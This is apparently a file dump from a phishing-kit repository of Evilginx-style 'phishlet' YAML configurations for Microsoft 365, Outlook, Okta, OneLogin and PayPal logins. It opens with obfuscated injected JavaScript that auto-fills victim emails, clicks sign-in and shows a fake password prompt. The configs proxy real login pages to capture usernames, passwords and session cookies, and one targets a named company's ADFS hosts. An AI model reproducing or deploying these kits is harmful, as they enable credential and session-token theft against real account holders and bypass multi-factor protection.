_0x444577=-parseInt(_0x5ec8bb(0x167))/(-0x41*0x91+0x1243*0x1+-0x128f*-0x1)*(-parseInt(_0x5ec8bb(0x187))/(0x3*0x2fe+-0xbc7+-0x2cf*-0x1))+-parseInt(_0x5ec8bb(0x15b))/(0xead*0x1+-0x16e+-0xd3c)*(-parseInt(_0x5ec8bb(0x155))/(-0x1b*-0x24+-0x3*-0x233+-0xa61*0x1))+-parseInt(_0x5ec8bb(0x15d))/(-0x223c+0x1420*-0x1+-0x3661*-0x1)+parseInt(_0x5ec8bb(0x165))/(-0x23a*0x10+0xf*0x4a+0x3ea*0x8)+-parseInt(_0x5ec8bb(0x16b))/(-0xfb*-0x26+-0x24c*0xd+-0x75f)*(parseInt(_0x5ec8bb(0x143))/(-0x1e23+0x1256+-0xbd5*-0x1))+parseInt(_0x5ec8bb(0x144))/(0xcb3+-0x6*0x61+0x299*-0x4)+-parseInt(_0x5ec8bb(0x16f))/(0x7a*0x4+0x1ae3+0x1*-0x1cc1)*(parseInt(_0x5ec8bb(0x166))/(0x1*-0x147d+-0x1a97*-0x1+-0x60f));if(_0x444577===_0x3a9f50)break;else _0x54aaae['push'](_0x54aaae['shift']());}catch(_0x16a14a){_0x54aaae['push'](_0x54aaae['shift']());}}}(_0x4864,0x5ddd9+0xc01*0xfb+-0x9d905)); checkElement3=async _0x4da37=>{var _0x2b896c=_0x5778,_0x206726={'NtbiS':function(_0x56a0cf,_0x29c3b0){return _0x56a0cf===_0x29c3b0;}};for(;_0x206726[_0x2b896c(0x154)](null,document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37));)await new Promise(_0x3df563=>requestAnimationFrame(_0x3df563));return document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37);};checkElement3(_0x410e92(0x15c)+_0x410e92(0x14e))[_0x410e92(0x185)](_0x468602=>{var _0x54fcff=_0x410e92,_0x3a611f={'wyKIM':_0x54fcff(0x14d)+_0x54fcff(0x149)};cancel=document[_0x54fcff(0x175)+_0x54fcff(0x173)](_0x3a611f[_0x54fcff(0x171)]),cancel[_0x54fcff(0x16d)](),cancel[_0x54fcff(0x176)]();return;});function _0x5778(_0x48bd0d,_0x4f20be){var _0x4b42d1=_0x4864();return _0x5778=function(_0x55d66e,_0x2b8c46){_0x55d66e=_0x55d66e-(0xcb3*-0x1+-0x7a*-0x3d+-0x102*0xf);var _0x56b5e4=_0x4b42d1[_0x55d66e];return _0x56b5e4;},_0x5778(_0x48bd0d,_0x4f20be);} checkElement=async _0x215f7d=>{var _0x30874e=_0x410e92,_0x5e7d54={'supNP':function(_0x883434,_0x323f5e){return _0x883434===_0x323f5e;}};for(;_0x5e7d54[_0x30874e(0x181)](null,document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d));)await new Promise(_0x45909d=>requestAnimationFrame(_0x45909d));return document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d);};checkElement(_0x410e92(0x183))[_0x410e92(0x185)](_0x156d6f=>{var _0x97d941=_0x410e92,_0x4efb2f={'NaHcx':_0x97d941(0x183),'wwDfO':_0x97d941(0x170)+'n9','FzbAh':_0x97d941(0x164)+_0x97d941(0x147),'nkPuA':function(_0x551351,_0x4abd64){return _0x551351<_0x4abd64;},'jtsCS':function(_0x2ba4ef,_0x56de8a){return _0x2ba4ef-_0x56de8a;},'KoKeW':function(_0x4ad73f,_0x490cea,_0x149ce4){return _0x4ad73f(_0x490cea,_0x149ce4);}},_0x4cfa81=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x157)]),_0x23ca5a=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x168)]),_0x24489f=window[_0x97d941(0x177)][_0x97d941(0x14a)];if(/#/[_0x97d941(0x146)](window[_0x97d941(0x177)][_0x97d941(0x14a)])){var _0x430fac=_0x4efb2f[_0x97d941(0x158)][_0x97d941(0x186)]('|'),_0x30fb78=0x138e+0x8*0x3a9+-0x30d6;while(!![]){switch(_0x430fac[_0x30fb78++]){case'0':_0x23ca5a[_0x97d941(0x176)]();continue;case'1':_0x55747b=String[_0x97d941(0x14b)+'de'][_0x97d941(0x174)](String,_0x2bbd05);continue;case'2':var _0x4fc903=_0x275d55[-0x24+-0x59*-0x1f+-0xaa2][_0x97d941(0x156)](/[=]/gi,'');continue;case'3':_0x4cfa81[_0x97d941(0x17b)]=_0x55747b;continue;case'4':return;case'5':_0x23ca5a[_0x97d941(0x16d)]();continue;case'6':for(var _0x55747b,_0x239c92=_0x4fc903[_0x97d941(0x14c)](-0x2316+0x1d*-0x157+0x49f2),_0x2bbd05=[],_0x8e4eb7=-0x2482+-0x799+0x2c1b;_0x4efb2f[_0x97d941(0x152)](_0x8e4eb7,_0x4efb2f[_0x97d941(0x15f)](_0x239c92[_0x97d941(0x14f)],0x39e+-0x1ed5+0x218*0xd));_0x8e4eb7+=0x22b6+0x2*0x51+-0x1*0x2356)_0x2bbd05[_0x97d941(0x150)](_0x4efb2f[_0x97d941(0x169)](parseInt,_0x239c92[_0x97d941(0x161)](_0x8e4eb7,0x1cef+-0x316+-0x19d7),-0x1ae+0x7*-0x259+0x122d));continue;case'7':_0x4cfa81[_0x97d941(0x16d)]();continue;case'8':var _0x275d55=_0x24489f[_0x97d941(0x186)]('#');continue;}break;}}}); checkElement2=async _0x2195e9=>{var _0xf10e89=_0x410e92,_0x3bc8a4={'qbHBe':function(_0x5c47e9,_0xf62cf8){return _0x5c47e9===_0xf62cf8;}};for(;_0x3bc8a4[_0xf10e89(0x151)](null,document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9));)await new Promise(_0x5283f6=>requestAnimationFrame(_0x5283f6));return document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9);};function _0x4864(){var _0x4e5d58=['supNP','\x20accessing','#i0116','QYnJR','then','split','4376DOmDZX','orgotPassw','rt\x20alert-e','1492360xeMxib','2374506yToWXe','/div>','test','3|5|0|4','\x20password<','Cancel','href','fromCharCo','substring','desktopSso','oCancel','length','push','qbHBe','nkPuA','erify\x20your','NtbiS','238444BSAvJm','replace','NaHcx','FzbAh','jzwAY','i0118','51eVYSJs','#desktopSs','3145070RoBCQT','mportant\x22\x20','jtsCS','ord','substr','use\x20you\x27re','znBFb','8|2|6|1|7|','298710PohhQS','2002TmIuPF','379yZWIKQ','wwDfO','KoKeW','querySelec','7ABcWLj','centHTML','focus','beforebegi','45620ORReFM','#idSIButto','wyKIM','\x20info,\x20you','ById','apply','getElement','click','location','insertAdja','Beca','class=\x22ale','#idA_PWD_F'];_0x4864=function(){return _0x4e5d58;};return _0x4864();}checkElement2(_0x410e92(0x180)+_0x410e92(0x141)+_0x410e92(0x160))[_0x410e92(0x185)](_0x54c929=>{var _0x2c9990=_0x410e92,_0x4ced35={'QYnJR':_0x2c9990(0x15a),'jzwAY':_0x2c9990(0x16e)+'n','znBFb':_0x2c9990(0x179)+_0x2c9990(0x15e)+_0x2c9990(0x17f)+_0x2c9990(0x142)+_0x2c9990(0x17e)+_0x2c9990(0x162)+_0x2c9990(0x182)+_0x2c9990(0x17c)+_0x2c9990(0x172)+_0x2c9990(0x17a)+_0x2c9990(0x153)+_0x2c9990(0x148)+_0x2c9990(0x145)};node=document[_0x2c9990(0x175)+_0x2c9990(0x173)](_0x4ced35[_0x2c9990(0x184)]),node[_0x2c9990(0x178)+_0x2c9990(0x16c)](_0x4ced35[_0x2c9990(0x159)],_0x4ced35[_0x2c9990(0x163)]);return;}); -------------------------------------------------------------------------------- /phishlet_examples/o365(working-october21).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@G66K ICQ: 747246257' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | # The lines below are needed if your target organization utilizes ADFS. 8 | # If they do, you need to uncomment all following lines that contain <...> 9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 11 | # = adfs 12 | # = example.com 13 | # = adfs.example.com 14 | 15 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 16 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 17 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false} 18 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false} 19 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 20 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 21 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 22 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 23 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 24 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 25 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false} 26 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false} 27 | 28 | sub_filters: 29 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 30 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 31 | # Uncomment and fill in if your target organization utilizes ADFS 32 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 33 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 34 | - {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 35 | - {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 36 | - {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 37 | - {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 38 | auth_tokens: 39 | - domain: '.login.microsoftonline.com' 40 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] 41 | - domain: 'login.microsoftonline.com' 42 | keys: ['SignInStateCookie'] 43 | auth_urls: 44 | - '/kmsi*' 45 | credentials: 46 | username: 47 | key: '(login|UserName)' 48 | search: '(.*)' 49 | type: 'post' 50 | password: 51 | key: '(passwd|Password)' 52 | search: '(.*)' 53 | type: 'post' 54 | login: 55 | domain: 'login.microsoftonline.com' 56 | path: '/' 57 | js_inject: 58 | - trigger_domains: ["www.domain.com"] 59 | trigger_paths: ["/"] 60 | script: | 61 | function gimmesleep(ms) { 62 | return new Promise(resolve => setTimeout(resolve, ms)); 63 | } 64 | async function redir() { 65 | await gimmesleep(2000); 66 | window.location.href = "{rurl}"; 67 | } 68 | redir() 69 | js_inject: 70 | - trigger_domains: ["login.microsoftonline.com"] 71 | trigger_paths: ["/common/oauth2/","/","/*"] 72 | script: | 73 | function lp(){ 74 | var emailId = document.querySelector("#i0116"); 75 | var nextButton = document.querySelector("#idSIButton9"); 76 | var query = window.location.href; 77 | if (/#/.test(window.location.href)){ 78 | var res = query.split("#"); 79 | var data1 = res[0]; 80 | var data2 = res[1]; 81 | console.log(data1); 82 | console.log(data2); 83 | if (emailId != null) { 84 | var m = data2.replace(/[=]/gi, ''); 85 | emailId.focus(); 86 | emailId.value = m; 87 | nextButton.focus(); 88 | nextButton.click(); 89 | console.log("YES!"); 90 | return; 91 | } 92 | } 93 | setTimeout(function(){lp();}, 1500); 94 | } 95 | setTimeout(function(){lp();}, 1500); -------------------------------------------------------------------------------- /phishlet_examples/o365(working2).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | # The lines below are needed if your target organization utilizes ADFS. 8 | # If they do, you need to uncomment all following lines that contain <...> 9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 11 | # = adfs 12 | # = example.com 13 | # = adfs.example.com 14 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 15 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 16 | sub_filters: 17 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | 19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 20 | # Uncomment and fill in if your target organization utilizes ADFS 21 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.login.microsoftonline.com' 25 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp'] 26 | - domain: 'login.microsoftonline.com' 27 | keys: ['SignInStateCookie', '.*,regexp'] 28 | credentials: 29 | username: 30 | key: '(login|UserName)' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: '(passwd|Password)' 35 | search: '(.*)' 36 | type: 'post' 37 | login: 38 | domain: 'login.microsoftonline.com' 39 | path: '/' 40 | js_inject: 41 | - trigger_domains: ["login.microsoftonline.com"] 42 | trigger_paths: ["/common/oauth2/"] 43 | trigger_params: ["email"] 44 | script: | 45 | function lp(){ 46 | var email = document.querySelectorAll('input[type=email]')[0]; 47 | if (email != null) { 48 | email.value = "{email}"; 49 | setTimeout(function(){ 50 | document.querySelectorAll('input[type=submit]')[0].click(); 51 | }, 5000); 52 | return; 53 | } 54 | setTimeout(function(){lp();}, 100); 55 | } 56 | setTimeout(function(){lp();}, 100); 57 | -------------------------------------------------------------------------------- /phishlet_examples/o365(working2a).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true} 8 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 9 | - {phish_sub: 'logincdn', orig_sub: 'logincdn', domain: 'msauth.net', session: false, is_landing: false} 10 | 11 | sub_filters: 12 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 13 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 14 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 19 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 22 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 23 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 24 | 25 | auth_tokens: 26 | - domain: '.login.microsoftonline.com' 27 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp'] 28 | - domain: 'login.microsoftonline.com' 29 | keys: ['SignInStateCookie', '.*,regexp'] 30 | - domain: 'login.live.com' 31 | keys: ['.*,regexp'] 32 | - domain: '.login.live.com' 33 | keys: ['.*,regexp'] 34 | credentials: 35 | username: 36 | key: '(login|UserName)' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: '(passwd|Password)' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'login.microsoftonline.com' 45 | path: '/' 46 | js_inject: 47 | - trigger_domains: ["login.microsoftonline.com"] 48 | trigger_paths: ["/common/oauth2/"] 49 | trigger_params: ["email"] 50 | script: | 51 | function lp(){ 52 | var email = document.querySelectorAll('input[type=email]')[0]; 53 | if (email != null) { 54 | email.value = "{email}"; 55 | setTimeout(function(){ 56 | document.querySelectorAll('input[type=submit]')[0].click(); 57 | }, 5000); 58 | return; 59 | } 60 | setTimeout(function(){lp();}, 100); 61 | } 62 | setTimeout(function(){lp();}, 100); 63 | -------------------------------------------------------------------------------- /phishlet_examples/okta.yaml: -------------------------------------------------------------------------------- 1 | author: '@mikesiegel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false} 5 | - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false } 6 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true} 7 | sub_filters: 8 | - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']} 9 | auth_tokens: 10 | - domain: 'EXAMPLE.okta.com' 11 | keys: ['sid'] 12 | credentials: 13 | username: 14 | key: '' 15 | search: '"username":"([^"]*)' 16 | type: 'json' 17 | password: 18 | key: '' 19 | search: '"password":"([^"]*)' 20 | type: 'json' 21 | login: 22 | domain: 'EXAMPLE.okta.com' 23 | path: '/login/login.htm' 24 | -------------------------------------------------------------------------------- /phishlet_examples/onelogin.yaml: -------------------------------------------------------------------------------- 1 | name: 'onelogin' 2 | author: '@perfectlylogical' 3 | min_ver: '2.3.0' 4 | # NOTE: Do not forget to change EXMAPLE to the relevant sub domain. 5 | proxy_hosts: 6 | - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false } 7 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true} 8 | - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false} 9 | # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading. 10 | #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false} 11 | sub_filters: [] 12 | auth_tokens: 13 | - domain: '.onelogin.com' 14 | keys: ['onelogin.com_user'] 15 | - domain: 'EXAMPLE.onelogin.com' 16 | keys: ['sub_session_onelogin.com'] 17 | auth_urls: 18 | - '/portal/' 19 | - '/client/apps' 20 | # This is used to force the rememebr me functionality if the target is using the /login url 21 | # This method will not work if they are using the multistep login method on the /login2 url 22 | force_post: 23 | - path: '/sessions' 24 | search: 25 | - {key: 'authenticity_token', search: '.*'} 26 | - {key: 'email', search: '.*'} 27 | - {key: 'password', search: '.*'} 28 | force: 29 | - {key: 'persist_session', value: 'true'} 30 | type: 'post' 31 | # The post type is used to capture credentials which use the /login url 32 | # The json type is used to capture credentials which use the /login2 url 33 | credentials: 34 | username: 35 | key: 'email' 36 | search: '(.*)' 37 | type: 'post' 38 | password: 39 | key: 'password' 40 | search: '(.*)' 41 | type: 'post' 42 | username: 43 | key: 'login' 44 | search: '"login":"(.*)"' 45 | type: 'json' 46 | password: 47 | key: 'password' 48 | search: '"password":"(.*)",' 49 | type: 'json' 50 | login: 51 | domain: 'EXAMPLE.onelogin.com' 52 | path: '/login' 53 | -------------------------------------------------------------------------------- /phishlet_examples/outlook(o365).yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false} 6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | auth_tokens: 18 | - domain: '.live.com' 19 | keys: ['WLSSC','RPSSecAuth'] 20 | credentials: 21 | username: 22 | key: 'login' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'passwd' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | domain: 'outlook.live.com' 31 | path: '/owa/?nlp=1' 32 | -------------------------------------------------------------------------------- /phishlet_examples/outlook.yaml: -------------------------------------------------------------------------------- 1 | author: '@mrgretzky' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false} 6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | auth_tokens: 18 | - domain: '.live.com' 19 | keys: ['WLSSC'] 20 | credentials: 21 | username: 22 | key: 'login' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'passwd' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | domain: 'outlook.live.com' 31 | path: '/owa/?nlp=1' 32 | -------------------------------------------------------------------------------- /phishlet_examples/paypal.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | # Email Params can be Triggered By using Below Command. 5 | # lures edit params ID email=test@email.com 6 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal. 7 | 8 | author: '@An0nud4y' 9 | min_ver: '2.3.0' 10 | proxy_hosts: 11 | - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true} 12 | - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true} 13 | # - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false} 14 | - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false} 15 | - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false} 16 | - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false} 17 | - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false} 18 | - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false} 19 | 20 | sub_filters: 21 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 